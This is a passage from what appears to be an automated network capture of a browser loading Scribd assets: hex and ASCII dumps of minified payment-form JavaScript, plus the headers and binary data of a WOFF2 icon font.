                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:20 UTC301INData Raw: 29 7d 29 2c 63 3d 22 73 68 69 70 70 69 6e 67 22 2c 73 3d 22 62 69 6c 6c 69 6e 67 22 2c 75 3d 28 30 2c 72 2e 6f 72 29 28 28 30 2c 72 2e 6d 43 29 28 7b 6d 6f 64 65 3a 28 30 2c 72 2e 6b 77 29 28 22 61 75 74 6f 6d 61 74 69 63 22 2c 22 64 69 73 61 62 6c 65 64 22 29 7d 29 2c 28 30 2c 72 2e 6d 43 29 28 7b 6d 6f 64 65 3a 28 30 2c 72 2e 6b 77 29 28 22 67 6f 6f 67 6c 65 5f 6d 61 70 73 5f 61 70 69 22 29 2c 61 70 69 4b 65 79 3a 72 2e 5a 5f 7d 29 29 2c 6c 3d 7b 61 75 74 6f 6d 61 74 69 63 3a 22 61 75 74 6f 6d 61 74 69 63 22 2c 64 69 73 61 62 6c 65 64 3a 22 64 69 73 61 62 6c 65 64 22 2c 67 6f 6f 67 6c 65 5f 6d 61 70 73 5f 61 70 69 3a 22 67 6f 6f 67 6c 65 5f 6d 61 70 73 5f 61 70 69 22 7d 2c 64 3d 7b 73 74 72 69 70 65 3a 22 73 74 72 69 70 65 22 2c 6d 65 72 63 68 61 6e 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )}),c="shipping",s="billing",u=(0,r.or)((0,r.mC)({mode:(0,r.kw)("automatic","disabled")}),(0,r.mC)({mode:(0,r.kw)("google_maps_api"),apiKey:r.Z_})),l={automatic:"automatic",disabled:"disabled",google_maps_api:"google_maps_api"},d={stripe:"stripe",merchant
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:20 UTC16384INData Raw: 29 28 22 66 75 6c 6c 22 2c 22 73 70 6c 69 74 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 29 29 7d 29 2c 6d 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 6c 69 6e 65 31 3a 28 30 2c 72 2e 6a 74 29 28 72 2e 5a 5f 29 2c 6c 69 6e 65 32 3a 28 30 2c 72 2e 6a 74 29 28 72 2e 5a 5f 29 2c 63 69 74 79 3a 28 30 2c 72 2e 6a 74 29 28 72 2e 5a 5f 29 2c 73 74 61 74 65 3a 28 30 2c 72 2e 6a 74 29 28 72 2e 5a 5f 29 2c 63 6f 75 6e 74 72 79 3a 28 30 2c 72 2e 6a 74 29 28 72 2e 5a 5f 29 2c 70 6f 73 74 61 6c 5f 63 6f 64 65 3a 28 30 2c 72 2e 6a 74 29 28 72 2e 5a 5f 29 7d 29 2c 66 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 6e 61 6d 65 3a 28 30 2c 72 2e 6a 74 29 28 72 2e 5a 5f 29 2c 61 64 64 72 65 73 73 3a 28 30 2c 72 2e 6a 74 29 28 28 30 2c 72 2e 6d 43 29 28 6d 29 29 2c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )("full","split","organization"))}),m=Object.freeze({line1:(0,r.jt)(r.Z_),line2:(0,r.jt)(r.Z_),city:(0,r.jt)(r.Z_),state:(0,r.jt)(r.Z_),country:(0,r.jt)(r.Z_),postal_code:(0,r.jt)(r.Z_)}),f=Object.freeze({name:(0,r.jt)(r.Z_),address:(0,r.jt)((0,r.mC)(m)),
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:20 UTC1024INData Raw: 6f 5f 70 61 79 22 2c 75 29 2c 28 30 2c 6f 2e 5a 29 28 72 2c 22 61 6d 61 7a 6f 6e 5f 70 61 79 22 2c 73 29 2c 72 29 7d 2c 33 35 31 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 72 34 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 48 7d 2c 6c 4b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 65 7d 2c 50 59 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 65 7d 2c 6c 48 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 65 7d 2c 6f 4e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 65 7d 2c 61 31 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 65 7d 2c 75 55 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 65 7d 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: o_pay",u),(0,o.Z)(r,"amazon_pay",s),r)},3514:function(e,t,n){"use strict";n.d(t,{r4:function(){return H},lK:function(){return se},PY:function(){return ce},lH:function(){return ue},oN:function(){return te},a1:function(){return ne},uU:function(){return re}}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:20 UTC8949INData Raw: 51 29 29 29 7d 29 29 29 2c 68 3d 28 28 30 2c 6d 2e 66 66 29 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 2e 72 6f 6c 6c 6f 75 74 43 6f 6e 66 69 67 7d 29 29 2c 66 2e 48 2c 6e 28 39 36 32 30 29 29 2c 79 3d 6e 28 38 32 32 39 29 2c 76 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 61 70 70 6c 65 5f 70 61 79 5f 69 6e 6e 65 72 22 3d 3d 3d 65 7c 7c 22 61 70 70 6c 65 5f 70 61 79 5f 6f 75 74 65 72 22 3d 3d 3d 65 7c 7c 22 61 70 70 6c 65 50 61 79 4f 75 74 65 72 22 3d 3d 3d 65 7c 7c 22 61 70 70 6c 65 50 61 79 49 6e 6e 65 72 22 3d 3d 3d 65 7d 2c 67 3d 5b 22 6c 69 6e 65 49 74 65 6d 73 22 5d 2c 62 3d 28 30 2c 61 2e 6d 43 29 28 7b 69 73 45 6c 69 67 69 62 6c 65 3a 61 2e 58 67 2c 74 79 70 65 3a 61 2e 6b 77 2e 61 70 70 6c 79 28 76 6f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Q)))}))),h=((0,m.ff)((function(e,t){return t.rolloutConfig})),f.H,n(9620)),y=n(8229),v=function(e){return"apple_pay_inner"===e||"apple_pay_outer"===e||"applePayOuter"===e||"applePayInner"===e},g=["lineItems"],b=(0,a.mC)({isEligible:a.Xg,type:a.kw.apply(vo
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:20 UTC8949INData Raw: 28 45 2e 6c 65 6e 67 74 68 3e 30 29 74 68 72 6f 77 20 6e 65 77 20 63 2e 4e 6f 28 22 49 6e 73 74 65 61 64 20 6f 66 20 70 61 73 73 69 6e 67 20 22 2e 63 6f 6e 63 61 74 28 45 2e 6a 6f 69 6e 28 22 2c 20 22 29 2c 22 20 6f 6e 20 63 6c 69 63 6b 2c 20 70 72 6f 76 69 64 65 20 74 68 65 20 70 61 72 61 6d 28 73 29 20 6f 6e 20 63 72 65 61 74 65 20 6f 72 20 75 70 64 61 74 65 20 69 6e 73 74 65 61 64 2e 22 29 29 7d 76 61 72 20 41 3d 7b 7d 3b 69 66 28 53 29 7b 76 61 72 20 50 3d 28 30 2c 73 2e 4a 6f 29 28 6e 75 6c 6c 3d 3d 53 3f 76 6f 69 64 20 30 3a 53 2e 61 6c 6c 6f 77 65 64 53 68 69 70 70 69 6e 67 43 6f 75 6e 74 72 69 65 73 29 3b 41 3d 28 30 2c 6f 2e 5a 29 28 28 30 2c 6f 2e 5a 29 28 7b 7d 2c 53 29 2c 7b 7d 2c 7b 61 6c 6c 6f 77 65 64 53 68 69 70 70 69 6e 67 43 6f 75 6e 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (E.length>0)throw new c.No("Instead of passing ".concat(E.join(", ")," on click, provide the param(s) on create or update instead."))}var A={};if(S){var P=(0,s.Jo)(null==S?void 0:S.allowedShippingCountries);A=(0,o.Z)((0,o.Z)({},S),{},{allowedShippingCount
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:20 UTC1240INData Raw: 2e 72 4d 2e 56 49 53 41 2c 73 2e 72 4d 2e 4d 41 53 54 45 52 43 41 52 44 2c 73 2e 72 4d 2e 4d 41 53 54 45 52 43 41 52 44 2c 73 2e 72 4d 2e 56 49 53 41 2c 73 2e 72 4d 2e 41 4d 45 58 2c 73 2e 72 4d 2e 4d 41 53 54 45 52 43 41 52 44 2c 73 2e 72 4d 2e 56 49 53 41 2c 73 2e 72 4d 2e 4d 41 53 54 45 52 43 41 52 44 2c 73 2e 72 4d 2e 41 4d 45 58 2c 73 2e 72 4d 2e 56 49 53 41 2c 73 2e 72 4d 2e 4d 41 53 54 45 52 43 41 52 44 2c 73 2e 72 4d 2e 56 49 53 41 2c 73 2e 72 4d 2e 4a 43 42 2c 73 2e 72 4d 2e 4d 41 53 54 45 52 43 41 52 44 2c 73 2e 72 4d 2e 41 4d 45 58 2c 73 2e 72 4d 2e 44 49 4e 45 52 53 2c 73 2e 72 4d 2e 56 49 53 41 2c 73 2e 72 4d 2e 4d 41 53 54 45 52 43 41 52 44 2c 73 2e 72 4d 2e 56 49 53 41 2c 73 2e 72 4d 2e 4d 41 53 54 45 52 43 41 52 44 2c 73 2e 72 4d 2e 56 49
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .rM.VISA,s.rM.MASTERCARD,s.rM.MASTERCARD,s.rM.VISA,s.rM.AMEX,s.rM.MASTERCARD,s.rM.VISA,s.rM.MASTERCARD,s.rM.AMEX,s.rM.VISA,s.rM.MASTERCARD,s.rM.VISA,s.rM.JCB,s.rM.MASTERCARD,s.rM.AMEX,s.rM.DINERS,s.rM.VISA,s.rM.MASTERCARD,s.rM.VISA,s.rM.MASTERCARD,s.rM.VI
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:20 UTC16384INData Raw: 2e 56 49 53 41 2c 73 2e 72 4d 2e 4d 41 53 54 45 52 43 41 52 44 2c 73 2e 72 4d 2e 41 4d 45 58 2c 73 2e 72 4d 2e 56 49 53 41 2c 73 2e 72 4d 2e 4d 41 53 54 45 52 43 41 52 44 2c 73 2e 72 4d 2e 56 49 53 41 2c 73 2e 72 4d 2e 4d 41 53 54 45 52 43 41 52 44 2c 73 2e 72 4d 2e 41 4d 45 58 2c 73 2e 72 4d 2e 56 49 53 41 2c 73 2e 72 4d 2e 4d 41 53 54 45 52 43 41 52 44 2c 73 2e 72 4d 2e 41 4d 45 58 2c 73 2e 72 4d 2e 56 49 53 41 2c 73 2e 72 4d 2e 56 49 53 41 2c 73 2e 72 4d 2e 4d 41 53 54 45 52 43 41 52 44 2c 73 2e 72 4d 2e 56 49 53 41 2c 73 2e 72 4d 2e 56 49 53 41 2c 73 2e 72 4d 2e 4d 41 53 54 45 52 43 41 52 44 2c 73 2e 72 4d 2e 56 49 53 41 2c 73 2e 72 4d 2e 4d 41 53 54 45 52 43 41 52 44 2c 73 2e 72 4d 2e 41 4d 45 58 2c 73 2e 72 4d 2e 56 49 53 41 2c 73 2e 72 4d 2e 4d 41
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .VISA,s.rM.MASTERCARD,s.rM.AMEX,s.rM.VISA,s.rM.MASTERCARD,s.rM.VISA,s.rM.MASTERCARD,s.rM.AMEX,s.rM.VISA,s.rM.MASTERCARD,s.rM.AMEX,s.rM.VISA,s.rM.VISA,s.rM.MASTERCARD,s.rM.VISA,s.rM.VISA,s.rM.MASTERCARD,s.rM.VISA,s.rM.MASTERCARD,s.rM.AMEX,s.rM.VISA,s.rM.MA
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:20 UTC16384INData Raw: 2c 65 29 7d 7d 2c 33 33 37 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 48 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 35 36 37 31 29 2c 6f 3d 6e 28 33 31 34 34 29 2c 69 3d 6e 28 39 30 33 38 29 2c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 28 30 2c 72 2e 5a 29 28 74 68 69 73 2c 65 29 2c 74 68 69 73 2e 5f 69 6e 43 6f 6e 74 65 78 74 44 61 74 61 3d 74 2c 74 68 69 73 2e 5f 69 6e 43 6f 6e 74 65 78 74 4f 75 74 65 72 3d 6e 65 77 20 69 2e 42 28 7b 69 6e 43 6f 6e 74 65 78 74 44 61 74 61 3a 74 2c 70 61 79 6d 65 6e 74 4d 65 74 68 6f 64 42 65 68 61 76 69 6f 72 3a 7b 6c 69 67 68 74 62 6f 78 46 72 61 6d 65 4f 70
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,e)}},3379:function(e,t,n){"use strict";n.d(t,{H:function(){return a}});var r=n(5671),o=n(3144),i=n(9038),a=function(){function e(t){(0,r.Z)(this,e),this._inContextData=t,this._inContextOuter=new i.B({inContextData:t,paymentMethodBehavior:{lightboxFrameOp
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:20 UTC8949INData Raw: 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 73 28 65 2c 74 7c 7c 74 68 69 73 26 26 74 68 69 73 2e 5f 63 6f 6e 74 72 6f 6c 6c 65 72 2c 21 31 2c 6e 29 7d 7d 7d 2c 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 72 2c 6f 29 7b 76 61 72 20 69 3d 74 68 69 73 3b 74 72 79 7b 72 65 74 75 72 6e 20 65 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 6f 29 2e 63 61 74 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 28 65 2c 74 7c 7c 69 26 26 69 2e 5f 63 6f 6e 74 72 6f 6c 6c 65 72 2c 21 30 2c 6e 29 7d 29 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 20 73 28 65 2c 74 7c 7c 74 68 69 73 26 26 74 68 69 73 2e 5f 63 6f 6e 74 72 6f 6c 6c 65 72 2c 21 31 2c 6e 29 7d 7d 7d 2c 79 3d 66 75 6e 63
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )}catch(e){return s(e,t||this&&this._controller,!1,n)}}},h=function(e,t,n){return function(r,o){var i=this;try{return e.call(this,r,o).catch((function(e){return s(e,t||i&&i._controller,!0,n)}))}catch(e){return s(e,t||this&&this._controller,!1,n)}}},y=func


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        10192.168.2.1649723151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:18 UTC592OUTGET /webpack/assets/fonts/icons/icons.d2ecf18b.woff2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC668INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 26448
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Wed, 14 Aug 2024 21:13:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: "023d1a1b4f8d6019b1ae1a9fa19483ac"
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                        x-amz-meta-surrogate-key: monolith
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: font/woff2
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Age: 2122518
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740034-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 452
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522359.233050,VS0,VE0
                                                                                                                                                                                                                                                                                                                                                                                        Timing-Allow-Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 77 4f 46 32 00 01 00 00 00 00 67 50 00 0b 00 00 00 01 03 ac 00 00 67 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 60 00 5c 11 08 0a 83 f2 50 83 93 3c 01 36 02 24 03 88 78 0b 84 3e 00 04 20 05 83 06 07 20 1b 17 d1 33 11 41 79 03 46 d9 be b6 eb 55 c7 c8 40 b0 71 20 80 6c 9f 38 fb af 13 e8 31 ae 76 89 86 b2 91 8d 72 90 89 e7 21 77 db 00 c5 7f 64 c4 f8 f4 e4 af 40 52 dd fc 26 39 b5 b5 6b bb 92 00 02 ee 69 84 d7 67 60 db c8 9f e4 e4 f5 9f e7 a7 eb 7f ed 73 ae 24 37 d2 dc 9b d4 29 8d 54 8c 92 36 15 5a 18 b8 35 83 b6 54 28 32 d4 04 d3 d1 b4 14 1b ad 61 23 86 0e 8c 42 c1 ff a7 30 e3 74 18 13 7b 1e ff 53 d5 fa 0f 20 a4 1d 82 20 ad 8d e5 16 cd b5 d7 5d 51 86 44 8a 4a c9 96 43 d6 66 34 f8 2d d0 da d6 a6 7c 21 e7 ce f6 fe 40 ba f9 2f
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: wOF2gPg`\P<6$x> 3AyFU@q l81vr!wd@R&9kig`s$7)T6Z5T(2a#B0t{S ]QDJCf4-|!@/
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 92 5e 3d 0e b1 d2 35 0d b2 83 d0 eb 09 64 9d 8a b3 2a d4 cc f8 80 4a 25 a7 7b aa 71 96 b1 60 99 ae e6 76 2a 1b a4 28 59 91 fe 14 a9 47 41 90 26 b9 24 4a 78 9c f0 e5 32 8e 73 db 63 d4 46 5b ec d6 fa bc 0c 64 32 06 b7 3a 18 e4 a0 34 d0 4a c9 26 47 dc 38 ed ef ed 55 2a a5 55 93 c4 da fe f6 a5 5b cc 02 a2 b5 51 b4 bf ac b7 f6 f7 c6 a6 b5 e7 63 cc 62 28 96 38 72 1e 08 42 2c 08 14 42 0a c6 00 59 d5 71 86 14 67 74 08 9a a2 b7 2e 08 ba 03 d7 7f f7 e1 82 3e 1a be 28 5e 5d 75 aa d8 1f 20 e8 7e 4d 9f 4e 4e 53 18 9e 8a 39 72 36 fd 3e 79 ea 2e 95 e7 e4 f6 a3 12 55 9d a2 a0 fa 47 3e 13 bf 79 03 cc df 78 54 8b 66 12 64 23 38 e5 a7 dc 34 5c 26 bc 5e 0b a2 94 b0 c0 e0 a8 2f 48 e6 e1 e8 9d cf e9 af 37 4f 6e aa fa e4 eb 8a 57 0f f5 f2 be 46 86 60 6a 86 f9 81 16 7f 4d c2 f9
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ^=5d*J%{q`v*(YGA&$Jx2scF[d2:4J&G8U*U[Qcb(8rB,BYqgt.>(^]u ~MNNS9r6>y.UG>yxTfd#84\&^/H7OnWF`jM
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 6a 35 b2 7e 7a bb 96 ce 5b ad e8 a3 8a ea 17 d6 0b 60 90 e6 40 9c 5c 1b 7e a0 ba c1 05 8d 35 e9 a0 40 e1 4b 89 d8 a8 f3 a7 b6 b8 64 91 29 ae c9 0d 3c 26 11 da 75 99 b1 24 e1 a0 5c 80 c0 4d 57 82 a3 cf 40 25 9a c7 1b 80 17 be 2b 0e 20 6b 64 c7 3b f9 be 2a 7d c6 03 18 23 ab 78 25 0f 0f 2d c1 de 13 d1 36 97 2d 6c 40 05 07 af e8 de fe 79 dd 6d a3 ef e4 a6 8a 67 d7 ee 32 d6 d1 46 40 a4 9f 38 af 8c 21 8f bb 91 53 80 cc 45 d0 e5 fd 2c 17 f0 64 14 dc 88 65 b5 bd 39 4b 61 da 86 76 ae 32 1f 01 86 3a 69 53 2d ea 3c f1 8e c6 48 0c c3 ae dc d2 2e 54 b1 57 22 d0 97 70 bf 32 96 4f 8b bb 98 7b 4c a6 73 41 db c6 17 80 0d ad 5d 3b 1c 11 a4 56 78 65 5b ac 6a 5b 8e 46 23 8d 4f 68 0d 8e ab b2 0d fe 5b d7 ab f4 68 72 85 dc 41 08 0d 22 1c c3 91 cf da bf 6d 82 e7 e6 88 81 04 b7
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: j5~z[`@\~5@Kd)<&u$\MW@%+ kd;*}#x%-6-l@ymg2F@8!SE,de9Kav2:iS-<H.TW"p2O{LsA];Vxe[j[F#Oh[hrA"m
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 42 b3 6f 37 68 aa cd 5c 12 da 35 7d eb ad 48 f2 be 39 68 b7 ea fc 89 0d 19 cd 7c b4 25 1b 1c 1f 24 12 36 c1 97 c1 fd 26 ab 0f 8c 7d ef 74 a1 4e 08 0d 84 dc 1b c3 fc 67 81 6b 82 28 29 19 5e 63 bf e2 ff 63 06 8f 37 2c c8 72 a0 45 36 64 df 83 b4 d9 5c 59 b7 5f ac 8e 02 63 81 c4 de f3 99 16 bc fa 7c cf 5c 1e f0 51 27 1d bd d8 9d fb b1 2b db 28 6a ee 4e b9 76 97 e7 10 fe 3b 70 52 2b c3 56 94 cc 77 02 76 4a 51 6c 5a 02 10 eb 27 54 bf ad 8b 51 08 0b 00 25 29 74 1f 88 80 e2 12 2f 41 8e 0e 13 62 e8 50 13 2f ce 70 41 10 2a 88 4a c1 32 3c d2 0f 4b 05 9a c7 13 a3 74 ca e4 ee 7a 1b 93 df 38 a6 51 c5 66 f2 e7 39 3b 2a e9 9a b6 0c 10 eb bb c0 15 1b f1 47 3a 71 31 12 5f b3 68 8f 48 ec 1a 39 00 d1 9f a4 34 57 22 c5 a7 ba 9a 40 4c 44 89 12 0a c1 52 fa a9 42 b9 e4 34 69 29
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Bo7h\5}H9h|%$6&}tNgk()^cc7,rE6d\Y_c|\Q'+(jNv;pR+VwvJQlZ'TQ%)t/AbP/pA*J2<Ktz8Qf9;*G:q1_hH94W"@LDRB4i)
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: e2 d9 59 b5 bd be 48 61 7e 3b ab d3 bb 1a f3 85 ab c1 69 ad b4 db 6b 4b 79 55 87 c7 30 01 e3 10 8a 62 59 fd c2 46 d1 d9 48 b6 9c 02 c4 f6 e9 92 4b a7 03 ee 2b a1 8a d4 05 79 a5 c2 fc 84 c5 a5 82 cb 0b f6 e8 77 8c 76 9d 64 c6 ab 0a 90 cc dd a2 b8 42 bc 46 5b 4d fc 6f cb 0b 1e 24 64 92 e9 db 46 c8 db d9 d1 42 c1 55 10 94 1a 85 f1 c1 f0 82 fb 7b aa b0 26 86 b7 6a 7f 27 b2 62 ae 23 d1 1d 37 a9 e3 f4 5c f6 dd 7d 01 84 b0 1b df d9 6b 65 89 b0 af f9 fb bd d9 72 69 38 75 9a 36 bf 69 32 48 e3 2b 47 93 18 a7 f6 26 11 d1 9e 15 8c 5d 95 59 6e 73 35 2d ba 14 9f c3 0f 80 cf be c4 bb 89 22 5c 41 1e 25 9a db ad b4 40 13 c5 33 97 64 c6 17 56 0b cc 0d 8f 9b d8 72 59 a8 8b bb 76 c2 45 c1 3c 41 c9 3c a7 9d 8c 0a 10 8e 95 4d cb 7e fc 8a ed eb 64 d7 a5 a7 34 dd f4 a2 12 41 a3
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: YHa~;ikKyU0bYFHK+ywvdBF[Mo$dFBU{&j'b#7\}keri8u6i2H+G&]Yns5-"\A%@3dVrYvE<A<M~d4A
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: 83 15 7a 28 85 a5 0f 92 50 ac 58 07 8c 47 b2 b1 27 e0 88 50 48 59 73 2e 8c cd a7 33 12 c8 3d 25 61 8c d3 36 5b f2 b0 c8 b1 f0 50 fe 21 ba 46 86 64 e1 ec 70 4f 84 9d e8 87 ab 0f 30 16 d7 31 76 8d 76 dc ae 2b c8 5d cc cd 32 39 85 f3 21 5d 7b 84 d7 5b ca 60 48 2c 87 a2 4c f3 c5 10 d1 a0 cf b7 d9 59 71 b6 5a 96 51 ec 60 0f a1 f4 76 52 b6 70 8a cb e5 f1 31 99 a1 2a 20 85 bf 08 29 19 db 60 ab 1d 80 bc c4 c8 8f 70 3e cc 16 a6 41 84 a2 50 c9 a4 7c e4 20 b3 57 8e b2 77 d8 a9 2a 2b b3 5e a6 f2 a3 9b d2 20 c5 05 ae 2f 4a 43 9e b1 ec 51 b6 88 5c 7d f9 51 68 9c 0a aa b6 22 de c9 ec 27 99 91 da 41 8d 0a e5 f2 13 77 fc 96 ab 2f 38 e4 6a ac 69 2a 7a 0e da dc d1 e8 51 9b e5 61 be ac 69 78 9b 3f 3f eb 59 0e 72 45 6e 18 79 c1 c6 db 6f 1a 73 85 24 0e 70 8d 2d 72 65 e8 0f 5c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: z(PXG'PHYs.3=%a6[P!FdpO01vv+]29!]{[`H,LYqZQ`vRp1* )`p>AP| Ww*+^ /JCQ\}Qh"'Aw/8ji*zQaix??YrEnyos$p-re\
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:19 UTC1378INData Raw: f0 f7 8c e1 2d e9 52 e3 d1 c1 d1 60 f7 82 03 73 c1 21 ef 37 c7 22 cc 7b 62 50 19 fc e0 c0 b5 6d 7b 69 61 97 07 31 85 bf 3c 73 81 50 a8 3d f1 14 af 96 47 bc 80 67 36 40 2d d3 7a ab bf d2 d3 3a ef 7d 55 54 d9 65 4b 01 fd 98 53 f4 d3 f8 13 b4 47 7f f4 7b f8 ea fd 33 37 86 98 ef ce e6 f1 69 7c 06 5b 27 c9 eb 19 35 79 79 5d cd c4 39 a1 52 71 22 fc 60 c6 d0 a2 5c 61 86 55 75 95 d2 21 12 48 e7 37 d6 40 2d 96 37 64 e9 03 03 db 2c 48 8a 8c fa 06 58 9c 67 7f b8 a8 c4 37 f0 1e a3 16 c1 fd d1 94 6e cf 6c d3 ed 6d cc 35 e9 e8 32 a9 23 3b b8 0d 89 4d 32 ae 12 a8 27 3e d2 3d cb c2 06 ef 7e 1e 52 37 0a 2d a5 62 d9 fc c9 22 e2 c3 1b 05 25 16 12 35 1c 01 4f 78 c7 03 45 88 d7 fb 5c 93 f5 a0 90 1e e1 69 80 39 61 03 7c 0b 9d f4 95 cd b3 6d 4b cc 7b 8b 75 96 45 bb 7a c4 39 94
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: -R`s!7"{bPm{ia1<sP=Gg6@-z:}UTeKSG{37i|['5yy]9Rq"`\aUu!H7@-7d,HXg7nlm52#;M2'>=~R7-b"%5OxE\i9a|mK{uEz9
